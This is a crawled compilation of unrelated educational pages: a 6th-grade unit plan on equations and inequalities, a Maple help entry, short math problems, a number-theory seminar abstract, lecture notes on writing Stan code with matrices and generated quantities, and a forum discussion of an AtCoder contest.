Questions | 2020-02-27 22:35:37 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 29, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8265306949615479, "perplexity": 2365.020809030877}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-10/segments/1581875146907.86/warc/CC-MAIN-20200227221724-20200228011724-00239.warc.gz"} |
https://www.fishtanklearning.org/curriculum/math/6th-grade/equations-and-inequalities/ | # Equations and Inequalities
Students discover how to use equations and inequalities to model relationships between quantities, and investigate the meaning of having a solution to an equation or an inequality.
## Unit Summary
In Unit 6, sixth graders move from expressions to equations and inequalities. They revisit familiar diagrams such as tape diagrams to model equations, and they discover new models such as balances and hanging mobiles. Students investigate what it means to be a solution to an equation or an inequality and how to use equations and inequalities to model relationships between quantities. When using an equation or inequality to represent real-world situations, students must decontextualize the situation to represent it using variables and symbols and then recontextualize in order to interpret what their answer means in regard to the situation at hand (MP.2). In this unit, students bring concepts from three domains together: Ratios and Proportions, Number Sense, and Expressions and Equations. They re-visit percentages from Unit 2 and solve percent problems using equations. They study relationships between different quantities and draw on their ratio reasoning where relevant. A note on fluency: solving equations provides a good opportunity for students to continue development of and to demonstrate fluency with decimal operations and fraction division. Several problems involve computing with decimals and dividing by fractions; include additional problems in practice for students as needed.
Several prior skills support students in this unit. In fifth grade, students analyzed patterns and relationships when they studied standard 5.OA.3. They also observed what happened when these relationships were plotted on the coordinate plane. In previous sixth-grade units, students studied algebraic and numerical expressions and collections of equivalent ratios. Students draw on all of these concepts and skills in this unit.
There are many future connections to the standards in this unit. In seventh grade, students will deeply investigate proportional relationships in the form $$y=rx$$, understanding the value of $$r$$ as the constant of proportionality. They’ll further investigate the graphs of these equations, and in eighth grade, students will compare across multiple representations of proportional relationships. Students will also become exposed to increasingly more complex equations and inequalities to solve.
Pacing: 17 instructional days (14 lessons, 2 flex days, 1 assessment day)
## Assessment
The following assessments accompany Unit 6.
### Pre-Unit
Have students complete the Pre-Unit Assessment and Pre-Unit Student Self-Assessment before starting the unit. Use the Pre-Unit Assessment Analysis Guide to identify gaps in foundational understanding and map out a plan for learning acceleration throughout the unit.
### Mid-Unit
Have students complete the Mid-Unit Assessment after lesson 6.
### Post-Unit
Use the resources below to assess student mastery of the unit content and action plan for future units.
## Unit Prep
### Intellectual Prep
Unit Launch
Prepare to teach this unit by immersing yourself in the standards, big ideas, and connections to prior and future content. Unit Launches include a series of short videos, targeted readings, and opportunities for action planning.
#### Internalization of Standards via the Post-Unit Assessment
• Take the Post-Unit Assessment. Annotate for:
• Standards that each question aligns to
• Strategies and representations used in daily lessons
• Relationship to Essential Understandings of unit
• Lesson(s) that Assessment points to
#### Internalization of Trajectory of Unit
• Read and annotate the Unit Summary.
• Notice the progression of concepts through the unit using the Lesson Map.
• Essential Understandings
• Connection to Post-Unit Assessment questions
• Identify key opportunities to engage students in academic discourse. Read through our Teacher Tool on Academic Discourse and refer back to it throughout the unit.
#### Unit-Specific Intellectual Prep
Models used in this unit (with examples): Tape diagram; Balance/mobile
### Essential Understandings
• A solution to an equation or inequality represents the value(s) for the variable that, when substituted in, make the equation or inequality a true statement. The solution set to an inequality can be represented using a ray on a number line.
• Equations are statements of balance between two expressions. In order to solve for a variable in an equation, whatever actions are taken on one side of the equation must also be taken on the other side in order to maintain the balance.
• An equation can be used to model the association between two quantities where one quantity is considered the independent variable and the other quantity is the dependent variable. These relationships can be represented in a table of values and graphed in the coordinate plane.
### Vocabulary
dependent variable
equation
inequality
independent variable
percent equation
solution
substitution
To see all the vocabulary for Unit 6, view our 6th Grade Vocabulary Glossary.
### Materials
• Optional: Balance scale (Teacher set)
• Optional: Graph Paper (2-3 sheets per student)
To see all the materials needed for this course, view our 6th Grade Course Material Overview.
## Lesson Map
Topic A: Reasoning About and Solving Equations
Topic B: Reasoning About and Solving Inequalities
Topic C: Representing and Analyzing Quantitative Relationships
## Common Core Standards
### Core Standards
#### Expressions and Equations
• 6.EE.B.5 — Understand solving an equation or inequality as a process of answering a question: which values from a specified set, if any, make the equation or inequality true? Use substitution to determine whether a given number in a specified set makes an equation or inequality true.
• 6.EE.B.6 — Use variables to represent numbers and write expressions when solving a real-world or mathematical problem; understand that a variable can represent an unknown number, or, depending on the purpose at hand, any number in a specified set.
• 6.EE.B.7 — Solve real-world and mathematical problems by writing and solving equations of the form x + p = q and px = q for cases in which p, q and x are all nonnegative rational numbers.
• 6.EE.B.8 — Write an inequality of the form x > c or x < c to represent a constraint or condition in a real-world or mathematical problem. Recognize that inequalities of the form x > c or x < c have infinitely many solutions; represent solutions of such inequalities on number line diagrams.
• 6.EE.C.9 — Use variables to represent two quantities in a real-world problem that change in relationship to one another; write an equation to express one quantity, thought of as the dependent variable, in terms of the other quantity, thought of as the independent variable. Analyze the relationship between the dependent and independent variables using graphs and tables, and relate these to the equation. For example, in a problem involving motion at constant speed, list and graph ordered pairs of distances and times, and write the equation d = 65t to represent the relationship between distance and time.
#### Ratios and Proportional Relationships
• 6.RP.A.3 — Use ratio and rate reasoning to solve real-world and mathematical problems, e.g., by reasoning about tables of equivalent ratios, tape diagrams, double number line diagrams, or equations.
• 6.RP.A.3.A — Make tables of equivalent ratios relating quantities with whole number measurements, find missing values in the tables, and plot the pairs of values on the coordinate plane. Use tables to compare ratios.
• 6.RP.A.3.C — Find a percent of a quantity as a rate per 100 (e.g., 30% of a quantity means 30/100 times the quantity); solve problems involving finding the whole, given a part and the percent.
• 6.EE.A.1
• 6.EE.A.2
• 6.EE.A.3
• 5.NF.A.1
• 5.NF.B.3
• 5.NF.B.4
• 5.OA.B.3
• 6.RP.A.1
• 6.RP.A.2
• 6.RP.A.3
• 6.NS.A.1
• 6.NS.B.2
• 6.NS.B.3
• 6.NS.C.6.C
• 6.NS.C.7
• 7.EE.B.4
• 8.EE.B.5
• 8.EE.B.6
• 8.EE.C.7
• 8.F.A.1
• 7.RP.A.2
• 7.RP.A.3
### Standards for Mathematical Practice
• CCSS.MATH.PRACTICE.MP1 — Make sense of problems and persevere in solving them.
• CCSS.MATH.PRACTICE.MP2 — Reason abstractly and quantitatively.
• CCSS.MATH.PRACTICE.MP3 — Construct viable arguments and critique the reasoning of others.
• CCSS.MATH.PRACTICE.MP4 — Model with mathematics.
• CCSS.MATH.PRACTICE.MP5 — Use appropriate tools strategically.
• CCSS.MATH.PRACTICE.MP6 — Attend to precision.
• CCSS.MATH.PRACTICE.MP7 — Look for and make use of structure.
• CCSS.MATH.PRACTICE.MP8 — Look for and express regularity in repeated reasoning.
https://www.maplesoft.com/support/help/Maple/view.aspx?path=AFactors | AFactors - Maple Programming Help
AFactors
inert absolute factorization
Calling Sequence: AFactors(p)
Parameters
p - multivariate polynomial
Description
• The AFactors function is a placeholder for representing an absolute factorization of the polynomial p, that is a factorization over an algebraic closure of its coefficient field. It is used in conjunction with evala.
• The construct AFactors(p) produces a data structure of the form $[u, [[f_1, e_1], \ldots, [f_n, e_n]]]$ such that $p = u\, f_1^{e_1} \cdots f_n^{e_n}$, where each $f_i$ is a monic (for the ordering chosen by Maple) irreducible polynomial.
• The call evala(AFactors(p)) computes the factorization of the polynomial p over the field of complex numbers. The polynomial p must have algebraic number coefficients.
• In the case of a univariate polynomial, the absolute factorization is just the decomposition into linear factors.
Examples
> evala(AFactors(x^2 - 2*y^2));
[1, [[x - RootOf(_Z^2 - 2)*y, 1], [x + RootOf(_Z^2 - 2)*y, 1]]]   (1)
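The univariate case described above works the same way. A minimal additional sketch (not part of the original help page; the exact display formatting of the output differs between Maple versions):
> evala(AFactors(x^2 - 2));
[1, [[x - RootOf(_Z^2 - 2), 1], [x + RootOf(_Z^2 - 2), 1]]]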
See Also
https://wesolveproblems.org.uk/collection/my-new-collection/ | My New Collection – We Solve Problems
Problems:
#### Theory of algorithms (other), ages 11-13
A cat tries to catch a mouse in labyrinths A, B, and C. The cat walks first, beginning with the node marked with the letter "K". Then the mouse (from the node "M") moves, then again the cat moves, etc. From any node the cat and mouse go to any adjacent node. If at some point the cat and mouse are in the same node, then the cat eats the mouse.
Can the cat catch the mouse in each of the cases A, B, C?
(Labyrinths A, B and C appear as figures in the original problem.)
#### Boundedness, monotonicity, quadratic inequalities and systems of inequalities, ages 14-17
For which natural K does the number reach its maximum value?
https://www.isid.ac.in/~statmath/?module=ViewSeminarDetails&Id=222 | # Seminar at SMU Delhi
October 14, 2015 (Wednesday), 3:30 PM at Webinar
Speaker: Devika Sharma, Indian Statistical Institute, Delhi
Title: Modular Galois representations
Abstract of Talk
Let $p$ be a prime and let $f$ be a modular form. Let $\rho_f$ be the two dimensional $p$-adic Galois representation attached to $f$. We are interested in the (local) behaviour of $\rho_f$ when $f$ is a $p$-ordinary form of weight at least $2$. A result of Wiles and Mazur-Wiles says that when $f$ is $p$-ordinary, $\rho_f$ restricted to the decomposition group $G_p$ at $p$ is reducible. Greenberg asked the natural question: when does $\rho_f \lvert_{G_p}$ split? It is not too hard to see that $\rho_f \lvert_{G_p}$ splits if $f$ has complex multiplication (CM). In this talk, we will discuss the converse, i.e., $$\rho_f \lvert_{G_p} \hbox{ splits} \stackrel{?}{\Longrightarrow} f \hbox{ has CM}.$$ We use deformation theory of Galois representations and the theory of $p$-adic families of modular forms (Hida families) to generate various non-trivial examples in support of the converse. I will describe these ideas in sufficient detail. This is joint work with Eknath Ghate.
https://jonathantemplin.github.io/Bayesian-Psychometric-Modeling-Course-Fall2022/lectures/lecture03b/03b_Efficent_Stan_Code_and_Generated_Quantities.html | # Efficent Stan Code and Generated Quantities
## Today’s Lecture Objectives
1. Making Stan Syntax Shorter
2. Computing Functions of Model Parameters
## Making Stan Code Shorter
The Stan syntax from our previous model was lengthy:
• A declared variable for each parameter
• The linear combination of coefficients multiplying predictors
Stan has built-in features to shorten syntax:
• Matrices/Vectors
• Matrix products
• Multivariate distributions (initially for prior distributions)
## Linear Models without Matrices
The linear model from our example was:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
with:
• $\text{Group2}_p$ the binary indicator of person $p$ being in group 2
• $\text{Group3}_p$ the binary indicator of person $p$ being in group 3
• $e_p \sim N(0,\sigma_e)$
## Linear Models with Matrices
Model (predictor) matrix:
$\textbf{X} = \left[ \begin{array}{cccccc} 1 & -4 & 0 & 0 & 0 & 0 \\ & & \vdots & & & \\ 1 & 12 & 0 & 1 & 0 & 12 \\ \end{array} \right]$
Coefficients vector:
$\boldsymbol{\beta} = \left[ \begin{array}{c} \beta_0 \\ \beta_1 \\ \beta_2 \\ \beta_3 \\ \beta_4 \\ \beta_5 \\ \end{array} \right]$
head(model.matrix(FullModelFormula, data = DietData))
(Intercept) Height60IN factor(DietGroup)2 factor(DietGroup)3
1 1 -4 0 0
2 1 0 0 0
3 1 4 0 0
4 1 8 0 0
5 1 12 0 0
6 1 -6 0 0
Height60IN:factor(DietGroup)2 Height60IN:factor(DietGroup)3
1 0 0
2 0 0
3 0 0
4 0 0
5 0 0
6 0 0
## Linear Models with Matrices
Using matrices, we can rewrite our regression equation from
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
To:
$\textbf{WeightLB} = \textbf{X}\boldsymbol{\beta} + \textbf{e}$
Where:
• $\textbf{WeightLB}$ is the vector of outcomes (size $N \times 1$)
• $\textbf{X}$ is the model (predictor) matrix (size $N \times P$ for $P-1$ predictors)
• $\boldsymbol{\beta}$ is the coefficents vector (size $P \times 1$)
• $\textbf{e}$ is the vector of residuals (size $N \times 1$)
## Example: Predicted Values
P=6
beta = matrix(data = runif(n = 6, min = 0, max = 10), nrow = P, ncol = 1)
X = model.matrix(FullModelFormula, data=DietData)
X %*% beta # R uses %*% for matrix products
[,1]
1 3.5041870
2 4.2407897
3 4.9773925
4 5.7139952
5 6.4505980
6 3.1358856
7 4.6090911
8 5.1615432
9 5.1615432
10 6.0822966
11 -1.5318296
12 5.4390386
13 12.4099067
14 19.3807748
15 26.3516430
16 -5.0172636
17 8.9244726
18 14.1526237
19 14.1526237
20 22.8662089
21 -25.4129828
22 -5.4996766
23 14.4136295
24 34.3269356
25 54.2402417
26 -35.3696358
27 -0.5213501
28 24.3702826
29 29.3486091
30 64.1968948
## Syntax Changes: Data Section
Old Syntax Without Matrices
data {
int<lower=0> N;
vector[N] weightLB;
vector[N] height60IN;
vector[N] group2;
vector[N] group3;
vector[N] heightXgroup2;
vector[N] heightXgroup3;
}
New Syntax With Matrices
data {
int<lower=0> N; // number of observations
int<lower=0> P; // number of predictors (plus column for intercept)
matrix[N, P] X; // model.matrix() from R
vector[N] y; // outcome
vector[P] meanBeta; // prior mean vector for coefficients
matrix[P, P] covBeta; // prior covariance matrix for coefficients
real sigmaRate; // prior rate parameter for residual standard deviation
}
## Syntax Changes: Parameters Section
Old Syntax Without Matrices
parameters {
real beta0;
real betaHeight;
real betaGroup2;
real betaGroup3;
real betaHxG2;
real betaHxG3;
real<lower=0> sigma;
}
New Syntax With Matrices
parameters {
vector[P] beta; // vector of coefficients for Beta
real<lower=0> sigma; // residual standard deviation
}
## Defining Prior Distributions
Previously, we defined a normal prior distribution for each regression coefficient
• Univariate priors – univariate normal distribution
• Each parameter had a prior that was independent of the other parameters
When combining all parameters into a vector, a natural extension is a multivariate normal distribution
• https://en.wikipedia.org/wiki/Multivariate_normal_distribution
• Mean vector (meanBeta; size $P \times 1$)
• Put all prior means for these coefficients into a vector from R
• Covariance matrix (covBeta; size $P \times P$)
• Put all prior variances (prior $SD^2$) into the diagonal
• With zeros for off diagonal, the MVN prior is equivalent to the set of independent univariate normal priors
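For example, the two prior inputs and the rate can be built in R like this (a sketch; the specific prior values are illustrative assumptions rather than the course's choices):

P = ncol(X)             # X = model.matrix(FullModelFormula, data = DietData) from earlier
meanBeta = rep(0, P)    # prior mean of zero for every coefficient
covBeta = diag(1000, P) # prior variance of 1000 on the diagonal, zero covariances
sigmaRate = 0.1         # rate of the exponential prior on sigma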
## Syntax Changes: Model Section
Old Syntax Without Matrices
model {
beta0 ~ normal(0,1);
betaHeight ~ normal(0,1);
betaGroup2 ~ normal(0,1);
betaGroup3 ~ normal(0,1);
betaHxG2 ~ normal(0,1);
betaHxG3 ~ normal(0,1);
sigma ~ exponential(.1); // prior for sigma
weightLB ~ normal(
beta0 + betaHeight * height60IN + betaGroup2 * group2 +
betaGroup3 * group3 + betaHxG2 *heightXgroup2 +
betaHxG3 * heightXgroup3, sigma);
}
New Syntax With Matrices
model {
beta ~ multi_normal(meanBeta, covBeta); // prior for coefficients
sigma ~ exponential(sigmaRate); // prior for sigma
y ~ normal(X*beta, sigma); // linear model
}
See: Example Syntax in R File
## Summary of Changes
• With matrices, there is less syntax to write
• Model is equivalent
• Output, however, is not labeled with respect to parameters
• May have to label output
# A tibble: 8 × 10
variable mean median sd mad q5 q95 rhat ess_bulk ess_tail
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 lp__ -78.0 -77.7 2.09 1.93 -82.0 -75.3 1.00 2840. 4327.
2 beta[1] 147. 147. 3.17 3.09 142. 152. 1.00 3044. 4196.
3 beta[2] -0.349 -0.352 0.485 0.475 -1.15 0.455 1.00 3258. 4432.
4 beta[3] -24.0 -24.0 4.46 4.40 -31.3 -16.6 1.00 3340. 4801.
5 beta[4] 81.5 81.5 4.22 4.14 74.6 88.5 1.00 3438. 4785.
6 beta[5] 2.45 2.45 0.683 0.680 1.33 3.54 1.00 3579. 4813.
7 beta[6] 3.53 3.53 0.640 0.630 2.48 4.58 1.00 3550. 4266.
8 sigma 8.24 8.10 1.22 1.16 6.51 10.4 1.00 4444. 4860.
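One way to attach readable labels afterwards (a sketch; it assumes the row order shown above and simply reuses the column names of the model matrix X from earlier):

betaNames = colnames(X)
summaryTable = model05_Samples$summary()
summaryTable$variable[2:7] = paste0(summaryTable$variable[2:7], ": ", betaNames)
summaryTable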
## Computing Functions of Parameters
• Often, we need to compute some linear or non-linear function of parameters in a linear model
• Missing effects (i.e., slope for Diet Group 2)
• Simple slopes
• $R^2$
• In non-Bayesian analyses, these are often formed with the point estimates of parameters
• For Bayesian analyses, however, we will seek to build the posterior distribution for any function of the parameters
• This means applying the function to all posterior samples
## Example: Need Slope for Diet Group 2
Recall our model:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 \text{Group2}_p + \beta_3 \text{Group3}_p + \beta_4\text{HeightIN}_p\text{Group2}_p +$
$\beta_5\text{HeightIN}_p\text{Group3}_p + e_p$
Here, $\beta_1$ is the change in $\text{WeightLB}_p$ per one-unit change in $\text{HeightIN}_p$ for a person in Diet Group 1 (i.e., $\text{Group2}_p=0$ and $\text{Group3}_p=0$)
Question: What is the slope for Diet Group 2?
• To answer, we need to first form the model when $\text{Group2}_p = 1$:
$\text{WeightLB}_p = \beta_0 + \beta_1\text{HeightIN}_p + \beta_2 + \beta_4\text{HeightIN}_p + e_p$
• Next, we rearrange terms that involve $\text{HeightIN}_p$:
$\text{WeightLB}_p = (\beta_0 + \beta_2) + (\beta_1 + \beta_4)\text{HeightIN}_p + e_p$
• From here, we can see the slope for Diet Group 2 is $(\beta_1 + \beta_4)$
• Also, the intercept for Diet Group 2 is $(\beta_0 + \beta_2)$
## Computing Slope for Diet Group 2
Our task: Create posterior distribution for Diet Group 2
• We must do so for each iteration we’ve kept from our MCMC chain
• A somewhat tedious way to do this is after using Stan
model05_Samples$summary()

# A tibble: 8 × 10
variable mean median sd mad q5 q95 rhat ess_bulk ess_tail
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 lp__ -78.0 -77.7 2.09 1.93 -82.0 -75.3 1.00 2840. 4327.
2 beta[1] 147. 147. 3.17 3.09 142. 152. 1.00 3044. 4196.
3 beta[2] -0.349 -0.352 0.485 0.475 -1.15 0.455 1.00 3258. 4432.
4 beta[3] -24.0 -24.0 4.46 4.40 -31.3 -16.6 1.00 3340. 4801.
5 beta[4] 81.5 81.5 4.22 4.14 74.6 88.5 1.00 3438. 4785.
6 beta[5] 2.45 2.45 0.683 0.680 1.33 3.54 1.00 3579. 4813.
7 beta[6] 3.53 3.53 0.640 0.630 2.48 4.58 1.00 3550. 4266.
8 sigma 8.24 8.10 1.22 1.16 6.51 10.4 1.00 4444. 4860.

slopeG2 = model05_Samples$draws("beta[2]") + model05_Samples$draws("beta[5]")
summary(slopeG2)

# A tibble: 1 × 10
variable mean median sd mad q5 q95 rhat ess_bulk ess_tail
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 beta[2] 2.10 2.10 0.481 0.463 1.31 2.88 1.00 7569. 6251.

## Computing the Slope Within Stan

Stan can compute these values for us, with the "generated quantities" section of the syntax:

generated quantities{
real slopeG2;
slopeG2 = betaHeight + betaHxG2;
}

The generated quantities block computes values that do not affect the posterior distributions of the parameters; they are computed after the sampling from each iteration.

• The values are then added to the Stan object and can be seen in the summary
• They can also be plotted using the bayesplot package

model04b_Samples$summary()
# A tibble: 9 × 10
variable mean median sd mad q5 q95 rhat ess_bulk
<chr> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl> <dbl>
1 lp__ -150. -149. 2.05 1.90 -153. -147. 1.00 1813.
2 beta0 0.214 0.207 0.997 0.993 -1.42 1.86 1.00 4119.
3 betaHeight 12.1 12.0 3.54 3.45 6.33 17.9 1.00 2311.
4 betaGroup2 123. 123. 28.2 28.0 76.3 169. 1.00 3443.
5 betaGroup3 229. 229. 24.7 24.2 189. 269. 1.00 4005.
6 betaHxG2 -9.96 -9.93 5.50 5.30 -19.1 -1.01 1.00 2370.
7 betaHxG3 -8.93 -8.88 5.17 5.16 -17.3 -0.531 1.00 2593.
8 sigma 71.8 71.0 8.90 8.48 58.8 87.9 1.00 3471.
9 slopeG2 2.11 2.08 4.29 4.24 -4.96 9.10 1.00 3711.
# … with 1 more variable: ess_tail <dbl>
## Computing the Slope with Matrices
To put this same method to use with our matrix syntax, we can form a contrast matrix
• Contrasts are linear combinations of parameters
• You may have used these in R via the glht() function in the multcomp package
For us, we form a contrast matrix that is size $C \times P$ where C are the number of contrasts
• The entries of this matrix are the values that multiply the coefficients
• For $(\beta_1 + \beta_4)$ this would be
• A one in the corresponding entry for $\beta_1$
• A one in the corresponding entry for $\beta_4$
• Zeros elsewhere
• $\textbf{C} = \left[ \begin{array}{cccccc} 0 & 1 & 0 & 0 & 1 & 0 \\ \end{array} \right]$
The contrast matrix then multiplies the coefficients vector to form the values:
$\textbf{C} \boldsymbol{\beta}$
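In R, the contrast matrix for this single contrast can be built and passed to Stan with the rest of the data (a sketch; the prior values and the outcome column name DietData$WeightLB are assumptions):

contrastMatrix = matrix(c(0, 1, 0, 0, 1, 0), nrow = 1)  # one row: picks out beta[2] + beta[5]
stanData = list(N = nrow(X), P = ncol(X), X = X, y = DietData$WeightLB,
                meanBeta = rep(0, ncol(X)), covBeta = diag(1000, ncol(X)), sigmaRate = 0.1,
                nContrasts = nrow(contrastMatrix), contrast = contrastMatrix)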
## Contrasts in Stan
We can change our Stan code to import a contrast matrix and use it in generated quantities:
data {
int<lower=0> N; // number of observations
int<lower=0> P; // number of predictors (plus column for intercept)
matrix[N, P] X; // model.matrix() from R
vector[N] y; // outcome
vector[P] meanBeta; // prior mean vector for coefficients
matrix[P, P] covBeta; // prior covariance matrix for coefficients
real sigmaRate; // prior rate parameter for residual standard deviation
int<lower=0> nContrasts;
matrix[nContrasts,P] contrast; // contrast matrix for additional effects
}
The generated quantities would then become:
generated quantities {
vector[nContrasts] contrasts;
contrasts = contrast*beta;
}
See example syntax for a full demonstration
## Computing $R^2$
We can use the generated quantities section to build a posterior distribution for $R^2$
There are several formulas for $R^2$, we will use the following:
$R^2 = 1 - \frac{RSS}{TSS} = 1 - \frac{\sum_{p=1}^{N}\left(y_p - \hat{y}_p\right)^2}{\sum_{p=1}^{N}\left(y_p - \bar{y}\right)^2}$
Where:
• RSS is the residual sum of squares
• TSS is the total sum of squares
• $\hat{y} = \textbf{X}\boldsymbol{\beta}$
• $\bar{y} = \sum_{p=1}^{N}\frac{y_p}{N}$
Notice: RSS depends on sampled parameters–so we will use this to build our posterior distribution for $R^2$
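The same posterior distribution can also be assembled after sampling, directly from the saved draws (a sketch; it assumes the posterior package that ships alongside cmdstanr, plus X from earlier and the outcome column name):

betaDraws = posterior::as_draws_matrix(model05_Samples$draws("beta"))  # draws x P matrix
y = DietData$WeightLB                                                  # outcome (column name assumed)
pred = betaDraws %*% t(X)                                              # one row of fitted values per draw
rss = rowSums((matrix(y, nrow(pred), ncol(pred), byrow = TRUE) - pred)^2)
tss = sum((y - mean(y))^2)
R2 = 1 - rss/tss                                                       # posterior draws of R-squared
quantile(R2, c(.025, .5, .975))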
## Computing $R^2$ in Stan
The generated quantities block can do everything we need to compute $R^2$
generated quantities {
vector[nContrasts] heightSlopeG2;
real rss; // residual sum of squares
real tss; // total sum of squares
real R2;
heightSlopeG2 = contrast*beta;
{ // anything in these brackets will not appear in summary
vector[N] pred;
pred = X*beta;
rss = dot_self(y-pred); // dot_self is a stan function
tss = dot_self(y-mean(y)); // mean(y) is subtracted from every element
}
R2 = 1 - rss/tss;
}
See the example syntax for a demonstration
## Wrapping Up
Today we further added to our Bayesian toolset:
• How to make Stan use less syntax using matrices
• How to form posterior distributions for functions of parameters
We will use both of these features in psychometric models
## Up Next
We have one more lecture on linear models that will introduce
• Methods for relative model comparisons
• Methods for checking the absolute fit of a model
Then all things we have discussed to this point will be used in our psychometric models.
https://codeforces.com/blog/entry/109206 | maroonrk's blog
By maroonrk, history, 3 months ago,
We will hold AtCoder Regular Contest 152.
The point values will be 400-500-600-700-800-1000.
We are looking forward to your participation!
• +109
» 3 months ago, # | 0 Will participate. Give me 2 Dan.
• » » 3 months ago, # ^ | +8 May not get 2 Dan, but the problems are very interesting!!! Thank you, writer!!!
• » » » 3 months ago, # ^ | 0 I'm so proud that I've solved ABD and I'm sure to get positive delta :)
» 3 months ago, # | -8 rp++!
» 3 months ago, # | +13 What the hell are the samples? They're so weak
» 3 months ago, # | ← Rev. 2 → -15 I'm so sad right now. Here is why: I tried approaching A by constructing the worst case (every gap is one of size 1). Here is the result.
• » » 3 months ago, # ^ | 0 Sympathetic
» 3 months ago, # | 0 Any hints for C?
• » » 3 months ago, # ^ | 0 +1
• » » 3 months ago, # ^ | 0 I think the idea behind problem C is quite inspiring, although I still can not understand the editorial. I have realized that selecting some value s means a mirror symmetry, but can't go further. Waiting for some other hints too.
» 3 months ago, # | +24 What a weird contest. Difficulty to me was A
• » » 3 months ago, # ^ | +16 E is more of a statement parsing problem but in a good sense. I don't think it's an easy problem for most participants because you need good skills in constructing math models and understanding what is important.
• » » 2 months ago, # ^ | +28 B is quite easily solvable if you notice that if they need to pass each other twice, they might as well start at the point where they passed each other for the first time.
» 3 months ago, # | +5 That was so hard that I only solved A. :(
• » » 3 months ago, # ^ | 0 and then 1233 -> 1216
• » » » 3 months ago, # ^ | 0 for me 1256 -> 1206 :pain:I were also able to make A only :pain:
» 3 months ago, # | ← Rev. 2 → -39 What the hell was that ??? I'm 1667 Elo on codechef and 1132 Elo on codeforces and unable to solve problem A. It's ridiculous.And Editorial provide no explanation of the formula.I basically solve nothing and learn nothing.I Will no more do Regular Contest for a long long time...
• » » 3 months ago, # ^ | +12 Go and do more ABC problems. They are much easier.When you are likely to solve problem E~F in ABC, then back to ARC. I am sure you can enjoy the problems.
» 3 months ago, # | -8 Can someone please explain problem B approach ?? I didn't get clearly the idea even with the tutorial.
» 3 months ago, # | 0 Can anyone explain what needed to be done in problem A? and why was it to be done this way!?I don't understand the editorial to a good extent, maybe someone can help here.
• » » 3 months ago, # ^ | ← Rev. 3 → 0 Ordering of the group matters like they will come in the order given there so you just need to let the group sit like upcoming can't seat so here only two kind of group make exists (i.e. size of 1 and 2) so group of size 1 can sit anywhere, ans can be "NO" only when a group of size 2 arrives! with some condition.So we just need to let groups sit so that it can occupy one or two more space than their own sizes which will lead to not make a sit for upcomers.Remember group of 2 only will face difficulty always!My Code
• » » 3 months ago, # ^ | 0 My approach is to simulate the worst case that each arrived group will pick a position one unit away from previous group if possible. i.e. x group1 x group2 x group3 ... where x is empty seats.
» 3 months ago, # | +47 Thank you for your participation!
» 3 months ago, # | 0 Can anyone prove the solution of B problem, I solved but I can't prove it.
» 3 months ago, # | ← Rev. 2 → 0 why is this not working my approch -> https://atcoder.jp/contests/arc152/submissions/36673139
» 3 months ago, # | 0 Can someone explain C in detail? I can't understand the solution...
• » » 2 months ago, # ^ | +32 Consider a sorted sequence and arbitrary two operations with $s_1$ and $s_2$. The sequence changes by $+2(s_1-s_2)$, the order of elements is unchanged. Here $s_1 = a_p$ and $s_2 = 2s_1-a_r$ for some $p,r$, so $2(s_1-s_2) = 2(a_r-a_p)$. Obviously then, if $g$ is the GCD of all elements, then their remainders modulo $2g$ can't change. In an even number of operations, it's clear that the smallest possible value of the first element is $a_1$ modulo $2g$.The remainders modulo $2g$ won't change in one operation either, since $2a_p-a_i = 2(a_p-a_i)+a_i \equiv a_i$ modulo $2g$. If the number of operations is odd, all that matters is that the order of elements in the sorted sequence is reversed, so the smallest possible value of the first element could be $a_N$ modulo $2g$ instead. (Since $g$ is the GCD of differences, each $a_i = b_i g + r$, only parities of $b_1, b_N$ matter.)Finally, it's always possible to construct a sequence in which the smallest element is $a_1 \% 2g$ by first adding and then subtracting some 2*differences, see Bezout's identity. The rule on non-negative elements isn't broken then.
• » » » 2 months ago, # ^ | 0 got it. thx.
» 3 months ago, # | -10 Why is this wrong for B?
constexpr int N = 200005;
int a[N];
set s;
signed main(){
    int n, l; cin>>n>>l;
    for(int i = 1; i <= n; i++) cin>>a[i];
    int ans = inf;
    for(int i = 1; i <= n; i++){ s.insert(l - a[i]); }
    int mi = inf;
    for(int i = 1; i <= n; i++){
        set::iterator it=s.lower_bound(a[i]);
        set::iterator it2=it;
        if(it!=s.begin()) it--;
        if(it2==s.end()) it2--;
        mi = min(mi, abs(a[i] - *it));
        mi = min(mi, abs(a[i] - *it2));
    }
    ans = min(ans, mi * 2 + l * 2);
    cout<
• » » 2 months ago, # ^ | 0 Why are you --it2? I think you should just leave it. AC code Linkk
• » » 2 months ago, # ^ | 0 The problem is my inf is not big enough.
